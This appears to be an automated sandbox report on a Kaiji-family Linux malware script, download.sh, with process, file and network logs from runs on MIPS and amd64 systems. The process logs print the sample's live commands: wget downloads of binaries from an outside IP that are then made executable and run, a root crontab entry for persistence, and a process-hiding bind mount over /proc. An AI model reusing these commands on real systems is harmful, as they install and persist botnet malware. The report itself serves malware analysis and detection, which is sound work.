Malware Analysis Report

2025-05-05 22:14

Sample ID 250416-xe2xesylt3
Target download.sh
SHA256 1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca
Tags
kaiji defense_evasion discovery execution persistence privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca

Threat Level: Known bad

The file download.sh was found to be: Known bad.

Malicious Activity Summary

kaiji defense_evasion discovery execution persistence privilege_escalation

Kaiji family

Kaiji

Executes dropped EXE

Modifies Watchdog functionality

File and Directory Permissions Modification

Modifies init.d

Enumerates running processes

Write file to user bin folder

Creates/modifies Cron job

Creates/modifies environment variables

Modifies Bash startup script

Changes its process name

System Network Configuration Discovery

Command and Scripting Interpreter: Unix Shell

Enumerates kernel/hardware configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-04-16 18:46

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2025-04-16 18:46

Reported

2025-04-16 18:49

Platform

debian9-mipsel-20240418-en

Max time kernel

149s

Max time network

147s

Command Line

[/tmp/download.sh]

Signatures

Kaiji

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Kaiji family

kaiji

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/linux_mips /tmp/download.sh N/A
N/A /tmp/linux_mipsel /tmp/download.sh N/A
N/A /tmp/linux_mipsel /tmp/linux_mipsel N/A
N/A /etc/32676 /bin/sh N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/crontab /bin/sh N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself ksoftirqd/0 /tmp/linux_mipsel N/A

Command and Scripting Interpreter: Unix Shell

execution
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /tmp/linux_mipsel N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /tmp/linux_mipsel N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/linux_mips N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/linux_mipsel N/A
N/A N/A /tmp/linux_mipsel N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/linux_mips /usr/bin/wget N/A
File opened for modification /tmp/linux_mipsel /usr/bin/wget N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/bin/uname

[uname -s]

/bin/uname

[uname -m]

/bin/rm

[rm -f linux_mips]

/usr/bin/wget

[wget -t 1 http://154.40.47.248:8000/linux_mips]

/bin/chmod

[chmod +x linux_mips]

/tmp/linux_mips

[./linux_mips]

/bin/rm

[rm -f linux_mips]

/bin/rm

[rm -f linux_mipsel]

/usr/bin/wget

[wget -t 1 http://154.40.47.248:8000/linux_mipsel]

/bin/chmod

[chmod +x linux_mipsel]

/tmp/linux_mipsel

[./linux_mipsel]

/tmp/linux_mipsel

[./linux_mipsel ]

/bin/rm

[/bin/rm /tmp/download.sh]

/bin/sh

[/bin/sh -c /etc/32676&]

/etc/32676

[/etc/32676]

/usr/sbin/service

[service crond start]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sleep

[sleep 60]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/usr/local/sbin/systemctl

[systemctl start crond.service]

/usr/local/bin/systemctl

[systemctl start crond.service]

/usr/sbin/systemctl

[systemctl start crond.service]

/usr/bin/systemctl

[systemctl start crond.service]

/sbin/systemctl

[systemctl start crond.service]

/bin/systemctl

[systemctl start crond.service]

/bin/sh

[/bin/sh -c echo "*/1 * * * * root /.mod " >> /etc/crontab]

/usr/bin/renice

[renice -20 803]

/bin/mount

[mount -o bind /tmp/ /proc/803]

/usr/sbin/service

[service cron start]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/usr/local/sbin/systemctl

[systemctl start cron.service]

/usr/local/bin/systemctl

[systemctl start cron.service]

/usr/sbin/systemctl

[systemctl start cron.service]

/usr/bin/systemctl

[systemctl start cron.service]

/sbin/systemctl

[systemctl start cron.service]

/bin/systemctl

[systemctl start cron.service]

/bin/systemctl

[systemctl start crond.service]

/bin/sleep

[sleep 60]

/bin/sleep

[sleep 60]

Network

Country Destination Domain Proto
US 154.40.47.248:8000 154.40.47.248 tcp
US 154.40.47.248:8000 154.40.47.248 tcp
AU 1.1.1.1:53 www.google.com udp
AU 1.1.1.1:53 www.google.com udp
US 154.40.47.248:888 tcp

Files

/tmp/linux_mips

MD5 5ec2f6c412ccfcc16781a7f3f37fb474
SHA1 912cb18493577a0b5c64d994f4b6bc05990ae390
SHA256 e58dffab271cd20cb6089017017d8e6c5f68c56c2b1877e8a94bbcdadcd4ef4c
SHA512 ce37675e1ccfd0e7fdf2fe155473d94222ceb28cf8a3c797033617a07e7ce632240bdbb338d7c3aec5131a343d172a4d58a05e2558408e42b3eb80cf1767857f

/tmp/linux_mipsel

MD5 06a141032d508ea7639d82c044851727
SHA1 e49bf29f0c21f0e5a5d0ccee733ed1626df57d6b
SHA256 d3030e1575b48293f9364353127bd44892ec65120c11d1710eead510373aab55
SHA512 8173fc77c9ba84dc1a980c907dec6d2a37e20b3dec5438189fb1990e6c161de5a7ebc033091be2bcd7b80fb1bfe1478eb9f81f6811c9417fd95d3419c9cc2e05

/etc/.walk

MD5 b03c65123544e7d4af3d3db728b0c4d4
SHA1 e32b964efbce48c2817f38e97be344c23b4d48e7
SHA256 b29e13608838bdb20808aa6aaa14458f4a7484c9784575995d3bcac0e669f2ec
SHA512 8cbd864bc70ff26b2b1d0ebde6341daa6df7c6033ec0d1114a74f3fb891a079722e857434f36967d853a8297854d29bec1f16ad1386f6d5148f0a26f9b330861

/etc/.walk

MD5 198407eedf6bfd37808428ab3300a90a
SHA1 9994b48255824c0d4890ecdb0d2aed2aebb23de3
SHA256 4a53e272e3438656c162ca067a2a82f95e90f1c308cad7e3bbb9e8fc054958d1
SHA512 ffd55d7901a0a9a1416c3999535393179836edc863818422fad3b9781f132d6bee6738221cbe109a87cd5f17d9574fe744fd58bde33bd36bf133a766ef516cb1

/etc/32676

MD5 585f408444cbca746945f0cb63f2c3f0
SHA1 0e44bae17174f04514e770ca7fc4bec1007e39cd
SHA256 ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299
SHA512 022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596

/.mod

MD5 f5a3713282e43c200f30342f5ff5e2ea
SHA1 2b2ce1a207e2b691a074c6f78f71c4785aae426a
SHA256 6ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511
SHA512 5bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013

/usr/bin/include/find

MD5 bb4edcad76062a76284c69f5fe4e50ea
SHA1 86055be4ce94fa3cffa9924e7b511e95df636606
SHA256 b7e25e128c130473f33c5135c78f591f35d7c4a7c5e1246c12eaa298db453474
SHA512 254acc62d2f83f5a4686adcf3fe6ad4697f392c288c5baa323830bb6f2466c303fd7bc9f237e98b2ca76bc3abb6b4c264e042be8c4291ae5cc21b2189d996521

/etc/profile.d/gateway.sh

MD5 1bc5e4de95c269b22485334c81253569
SHA1 8c421ecfdb8d090037226adc45f45de8c847f629
SHA256 2c6b57cdf813103c6e1db4e970c94378c2eaa362d94f3525afc3afb7249997b0
SHA512 d46c0af72a1663fa64f87f8ca891e2b5463b6219939125a0f2a89b9c13413733fa5171c5cf04dcaf346d88e468d44f0fc31af26e32b901dad5a4aa0462553416

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-16 18:46

Reported

2025-04-16 18:49

Platform

ubuntu1804-amd64-20250410-en

Max time kernel

149s

Max time network

147s

Command Line

[/tmp/download.sh]

Signatures

Kaiji

Description Indicator Process Target
N/A N/A N/A N/A

Kaiji family

kaiji

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/linux_amd64 /tmp/download.sh N/A
N/A /tmp/linux_amd64 /tmp/linux_amd64 N/A
N/A /etc/32676 /bin/sh N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/linux_amd64 N/A
File opened for modification /dev/misc/watchdog /tmp/linux_amd64 N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/crontab /bin/sh N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description Indicator Process Target
File opened for modification /etc/profile.d/bash_cfg /tmp/linux_amd64 N/A
File opened for modification /etc/profile.d/bash_cfg.sh /tmp/linux_amd64 N/A
File opened for modification /etc/profile.d/gateway.sh /tmp/linux_amd64 N/A

Enumerates running processes

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/alsa-utils /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/apparmor /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/bluetooth /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/cups /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/kmod /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/apport /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/cups-browsed /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/plymouth-log /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/selinux-autorelabel /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/uuidd /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/avahi-daemon /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/keyboard-setup.sh /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/rsync /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/saned /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/ssh /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/unattended-upgrades /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/speech-dispatcher /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/networking /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/procps /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/ufw /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/auditd /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/irqbalance /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/plymouth /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/x11-common /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/gdm3 /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/anacron /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/console-setup.sh /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/cron /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/spice-vdagent /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/acpid /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/hwclock.sh /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/udev /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/rsyslog /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/dbus /tmp/linux_amd64 N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/bin/find /tmp/linux_amd64 N/A
File opened for modification /usr/bin/lsof /tmp/linux_amd64 N/A
File opened for modification /usr/bin/include/find /tmp/linux_amd64 N/A
File opened for modification /usr/bin/include/lsof /tmp/linux_amd64 N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /etc/profile.d/bash_cfg /tmp/linux_amd64 N/A
File opened for modification /etc/profile.d/bash_cfg.sh /tmp/linux_amd64 N/A
File opened for modification /etc/profile.d/gateway.sh /tmp/linux_amd64 N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself ksoftirqd/0 /tmp/linux_amd64 N/A

Command and Scripting Interpreter: Unix Shell

execution
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /tmp/linux_amd64 N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /tmp/linux_amd64 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1204/stat /tmp/linux_amd64 N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/sys/kernel/osrelease /bin/systemctl N/A
File opened for reading /proc/723/stat /tmp/linux_amd64 N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/sys/kernel/osrelease /bin/systemctl N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/910/stat /tmp/linux_amd64 N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/460/stat /tmp/linux_amd64 N/A
File opened for reading /proc/sys/kernel/osrelease /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/sys/kernel/osrelease /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/690/stat /tmp/linux_amd64 N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/316/stat /tmp/linux_amd64 N/A
File opened for reading /proc/570/stat /tmp/linux_amd64 N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/sys/kernel/osrelease /bin/systemctl N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/1081/stat /tmp/linux_amd64 N/A
File opened for reading /proc/1146/stat /tmp/linux_amd64 N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/sys/kernel/osrelease /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1544/stat /tmp/linux_amd64 N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/sys/kernel/osrelease /bin/systemctl N/A
File opened for reading /proc/912/stat /tmp/linux_amd64 N/A
File opened for reading /proc/1346/stat /tmp/linux_amd64 N/A
File opened for reading /proc/1/environ /bin/systemctl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/linux_amd64 /usr/bin/wget N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/bin/uname

[uname -s]

/bin/uname

[uname -m]

/usr/bin/wget

[wget -t 1 http://154.40.47.248:8000/linux_amd64]

/bin/chmod

[chmod +x linux_amd64]

/tmp/linux_amd64

[./linux_amd64]

/tmp/linux_amd64

[./linux_amd64 ]

/bin/rm

[/bin/rm /tmp/download.sh]

/bin/sh

[/bin/sh -c /etc/32676&]

/etc/32676

[/etc/32676]

/usr/sbin/service

[service crond start]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sleep

[sleep 60]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/systemctl

[systemctl -p Triggers show acpid.socket]

/bin/systemctl

[systemctl -p Triggers show apport-forward.socket]

/bin/systemctl

[systemctl -p Triggers show avahi-daemon.socket]

/bin/systemctl

[systemctl -p Triggers show cups.socket]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show saned.socket]

/bin/systemctl

[systemctl -p Triggers show snapd.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/bin/systemctl

[systemctl -p Triggers show uuidd.socket]

/usr/local/sbin/systemctl

[systemctl start crond.service]

/usr/local/bin/systemctl

[systemctl start crond.service]

/usr/sbin/systemctl

[systemctl start crond.service]

/usr/bin/systemctl

[systemctl start crond.service]

/sbin/systemctl

[systemctl start crond.service]

/bin/systemctl

[systemctl start crond.service]

/bin/sh

[/bin/sh -c echo "*/1 * * * * root /.mod " >> /etc/crontab]

/usr/bin/renice

[renice -20 1536]

/bin/mount

[mount -o bind /tmp/ /proc/1536]

/usr/sbin/service

[service cron start]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/systemctl

[systemctl -p Triggers show acpid.socket]

/bin/systemctl

[systemctl -p Triggers show apport-forward.socket]

/bin/systemctl

[systemctl -p Triggers show avahi-daemon.socket]

/bin/systemctl

[systemctl -p Triggers show cups.socket]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show saned.socket]

/bin/systemctl

[systemctl -p Triggers show snapd.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/bin/systemctl

[systemctl -p Triggers show uuidd.socket]

/usr/local/sbin/systemctl

[systemctl start cron.service]

/usr/local/bin/systemctl

[systemctl start cron.service]

/usr/sbin/systemctl

[systemctl start cron.service]

/usr/bin/systemctl

[systemctl start cron.service]

/sbin/systemctl

[systemctl start cron.service]

/bin/systemctl

[systemctl start cron.service]

/bin/systemctl

[systemctl start crond.service]

/bin/sleep

[sleep 60]

/bin/sleep

[sleep 60]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 34.234.112.35:443 tcp
AU 1.1.1.1:53 ingress.openshift.gnome.org udp
US 34.234.112.35:443 ingress.openshift.gnome.org tcp
US 154.40.47.248:8000 154.40.47.248 tcp
N/A 224.0.0.251:5353 udp
GB 84.17.50.8:443 tcp
AU 1.1.1.1:53 1527653184.rsc.cdn77.org udp
AU 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp
AU 1.1.1.1:53 www.google.com udp
AU 1.1.1.1:53 www.google.com udp
US 154.40.47.248:888 tcp

Files

/tmp/linux_amd64

MD5 4a67fbaac9ab2555654663e56ad125a1
SHA1 d6dbe82c06c8bd5b83eea3daa26605b10c4e4457
